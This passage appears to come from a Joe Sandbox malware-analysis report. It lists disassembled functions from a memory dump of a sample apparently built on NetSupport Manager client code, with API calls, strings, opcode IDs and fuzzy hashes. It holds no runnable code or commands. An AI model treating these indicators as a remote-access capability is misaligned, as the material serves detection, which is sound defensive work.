                                                                                                              • Opcode Fuzzy Hash: ff60ef9c488c2c79b08b3262712ada230bbec0adfdbeaabbc1cb1cc15ddf1ff7
                                                                                                              • Instruction Fuzzy Hash: 2E81B675D00A1E9BDB10DBA4CC80FEEB7B9AF44309F4440D8E919A7245EA75AB84CF91
                                                                                                              APIs
                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,E43C2CA5,00000000,00000000,00000000), ref: 1103119A
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • EnumWindows.USER32(110301B0,00000001), ref: 11031272
                                                                                                              • EnumWindows.USER32(110301B0,00000000), ref: 110312CC
                                                                                                              • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 110312DC
                                                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 11031313
                                                                                                                • Part of subcall function 11027E50: _memset.LIBCMT ref: 11027E85
                                                                                                                • Part of subcall function 11027E50: wsprintfA.USER32 ref: 11027EBA
                                                                                                                • Part of subcall function 11027E50: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EFF
                                                                                                                • Part of subcall function 11027E50: GetExitCodeProcess.KERNEL32(?,?), ref: 11027F13
                                                                                                                • Part of subcall function 11027E50: CloseHandle.KERNEL32(?,00000000), ref: 11027F45
                                                                                                                • Part of subcall function 11027E50: CloseHandle.KERNEL32(?), ref: 11027F4E
                                                                                                              • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 1103132B
                                                                                                              • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 110313E7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                                              • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                                              • API String ID: 3887438110-1852639040
                                                                                                              • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                                              • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                                              • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                                              • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                                              APIs
                                                                                                                • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                                                • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                                                • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                                              • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                                              • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                                              • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                                              • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                                              • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                                              • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                                              • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                                              • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                                              • String ID: AddToJournal$Chat
                                                                                                              • API String ID: 693070851-2976406578
                                                                                                              • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                                              • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                                              • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                                              • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 1110534D
                                                                                                              • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                                              • GetTickCount.KERNEL32 ref: 1110535C
                                                                                                              • GetTickCount.KERNEL32 ref: 1110538E
                                                                                                              • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                                              • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                                              • GetTickCount.KERNEL32 ref: 111053EC
                                                                                                              • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                              • API String ID: 831250470-625438208
                                                                                                              • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                                              • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                                              • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                                              • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                                              APIs
                                                                                                              • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 11137363
                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                                              • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                                              • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                                              • _memset.LIBCMT ref: 111373D7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc$Version_memset
                                                                                                              • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                                              • API String ID: 1659045089-3162170060
                                                                                                              • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                                              • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                                              • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                                              • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                                              • _memset.LIBCMT ref: 11039131
                                                                                                              • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                                              • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                                              • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                                              • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                                              • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                                              • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                                                • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                                                • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3085755443-3916222277
                                                                                                              • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                                              • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                                              • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                                              • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                                              APIs
                                                                                                              • wsprintfA.USER32 ref: 1106F397
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeavewsprintf
                                                                                                              • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                                              • API String ID: 3005300677-3496508882
                                                                                                              • Opcode ID: 39a7049b07ce781649e512e0e1065f178741ae477e8da126b9dd4c2485176ebe
                                                                                                              • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                                              • Opcode Fuzzy Hash: 39a7049b07ce781649e512e0e1065f178741ae477e8da126b9dd4c2485176ebe
                                                                                                              • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                                              APIs
                                                                                                              • IsWindow.USER32(?), ref: 11047211
                                                                                                              • _malloc.LIBCMT ref: 110472AD
                                                                                                              • _memmove.LIBCMT ref: 11047312
                                                                                                              • SendMessageTimeoutA.USER32(?,0000004A,0002049E,00000005,00000002,00002710,?), ref: 11047372
                                                                                                              • _free.LIBCMT ref: 11047379
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                                                • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                                                • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                                                • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                                                • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                                              • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                              • API String ID: 3960737985-1318765656
                                                                                                              • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                                              • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                                              • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                                              • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                                                • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                                                • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                                                • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                                              • _memmove.LIBCMT ref: 1102D24A
                                                                                                              • _memmove.LIBCMT ref: 1102D26E
                                                                                                              • _memmove.LIBCMT ref: 1102D2A8
                                                                                                              • _memmove.LIBCMT ref: 1102D2C4
                                                                                                              • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                              • String ID: deque<T> too long
                                                                                                              • API String ID: 827257264-309773918
                                                                                                              • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                                              • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                                              • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                                              • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                                              APIs
                                                                                                              • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                                              • _memset.LIBCMT ref: 110051C0
                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                                              • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                                              • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
